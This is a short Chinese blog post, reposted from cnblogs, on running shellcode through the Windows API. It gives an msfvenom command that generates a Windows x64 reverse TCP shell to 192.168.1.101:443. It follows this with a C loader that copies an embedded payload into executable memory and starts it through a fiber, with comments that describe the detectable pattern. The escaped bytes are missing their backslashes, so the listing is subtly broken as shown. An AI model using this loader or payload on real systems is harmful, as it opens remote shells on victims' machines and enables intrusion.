使用 Windows API 加载 shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c -b x00x0ax0d

这是一个简单的在本地进程中执行 shellcode 的示例代码

#include "stdafx.h"
#include <Windows.h>

/*
 * Entry point: executes an embedded byte array in the current process by
 * (1) committing an RWX region, (2) copying the bytes into it, and
 * (3) handing that region to the fiber scheduler as a fiber start routine.
 *
 * No return value of any Win32 call below is checked, so a failed
 * VirtualAlloc or CreateFiber (NULL) propagates straight into memcpy /
 * SwitchToFiber.  Nothing in this listing ever switches back to
 * mainFiber, so `return 0` is reached only if the fiber itself yields.
 *
 * NOTE(review): from a detection standpoint the sequence
 * VirtualAlloc(PAGE_EXECUTE_READWRITE) -> memcpy -> CreateFiber with a
 * start address outside any loaded image is the observable pattern here;
 * the fiber switch is what transfers control, not a new thread.
 */
int main()
{
    /* Turns the calling thread into a fiber so SwitchToFiber is legal later.
     * The returned handle is never used again in this listing. */
    PVOID mainFiber = ConvertThreadToFiber(NULL);

    /* Opaque payload bytes; presumably the output of the msfvenom command
     * quoted above the listing — not verified here. */
    unsigned char shellcode[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbx7exbaxddx1fx3bx4fx8cx24x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x82xf2x5exfbxcbxa7"
"x4cx24x7exbax9cx4ex7ax1fxdex75x28xf2xecxcdx5e"
"x07x07x76x1exf2x56x4dx23x07x07x76x5exf2x56x6d"
"x6bx07x83x93x34xf0x90x2exf2x07xbdxe4xd2x86xbc"
"x63x39x63xacx65xbfx73xd0x5ex3ax8ex6exc9x2cxfb"
"x8cx57xb0x1dxacxafx3cx86x95x1exebxc4x0cxacx7e"
"xbaxddx57xbex8fxf8x43x36xbbx0dx4fxb0x07x94x60"
"xf5xfaxfdx56x3ax9fx6fx72x36x45x14x5exb0x7bx04"
"x6cx7fx6cx90x2exf2x07xbdxe4xd2xfbx1cxd6x36x0e"
"x8dxe5x46x5axa8xeex77x4cxc0x00x76xffxe4xcex4e"
"x97xd4x60xf5xfaxf9x56x3ax9fxeax65xf5xb6x95x5b"
"xb0x0fx90x6dx7fx6ax9cx94x3fxc7xc4x25xaexfbx85"
"x5ex63x11xd5x7ex3fxe2x9cx46x7ax15xc4xa7x92x9a"
"x9cx4dxc4xafxd4x65x27xe0x95x94x29xa6xdbxdbx81"
"x45x80x56x85x38xffx16x21x89xefx1fx3bx0exdax6d"
"xf7x5cx95x9exd7xefx8dx24x7exf3x54xfax72xf3x8e"
"x24x7fx01x1dxb7x3ax2axcdx70x37x33x39x53xb2xbe"
"xcdx9ex32xcdxfbx18xc4x9axc0xadx94xd2xdcx1ex3b"
"x4fxd5x65xc4x93x5dx74x3bxb0x59x74x2exf7xecxd6"
"x76x7ex4cx6cx81x7ax95x96xf9x07x73xe4x36x33x1c"
"x5ex81xa5x83xfbx9ex45x08x57xb2x88xe6x34x3fxe2"
"x91x96xd9x07x05xddx3fx00x44xbax4fx2ex73xf1x36"
"x3bx19x5fx39x4fx8cx6dxc6xd9xb0x7bx3bx4fx8cx24"
"x7exfbx8dx5ex6bx07x05xc6x29xedx8ax52x0ax8fxe6"
"x29x27xfbx8dxfdxc7x29x4bx60x5axeexdcx1ex73xc2"
"xc8x00x66x7cxddx77x73xc6x6ax72x2exfbx8dx5ex6b"
"x0exdcx6dx81x7ax9cx4fx72xb0x44x69xf7x7bx91x96"
"xfax0ex36x5dxb2x85x5bxe0xeex07xbdxf6x36x45x17"
"x94x35x0ex36x2cxf9xa7xbdxe0xeexf4x7cx91xdcxec"
"x9cxa5x9dxdax31xb9x81x6fx95x9cxffx67xb0x22x02"
"xb0x5dxe4xdbx3ax89x9fx39xa9xafx70x51x4fxd5x65"
"xf7x60x22xcax3bx4fx8cx24";

    /* Commits a private region that is writable AND executable at once
     * (PAGE_EXECUTE_READWRITE); the result is not checked for NULL. */
    PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    /* sizeof shellcode includes the trailing NUL of the string literal. */
    memcpy(shellcodeLocation, shellcode, sizeof shellcode);

    /* The freshly written buffer becomes the fiber's start routine; the
     * cast is what makes the data pointer callable.  Not checked for NULL. */
    PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
    
    /* Transfers control to the fiber on the current thread — no new thread
     * is created.  Execution returns here only if the fiber switches back,
     * which nothing in this listing does. */
    SwitchToFiber(shellcodeFiber);

    return 0;
}

 

原文地址:https://www.cnblogs.com/-zhong/p/13922748.html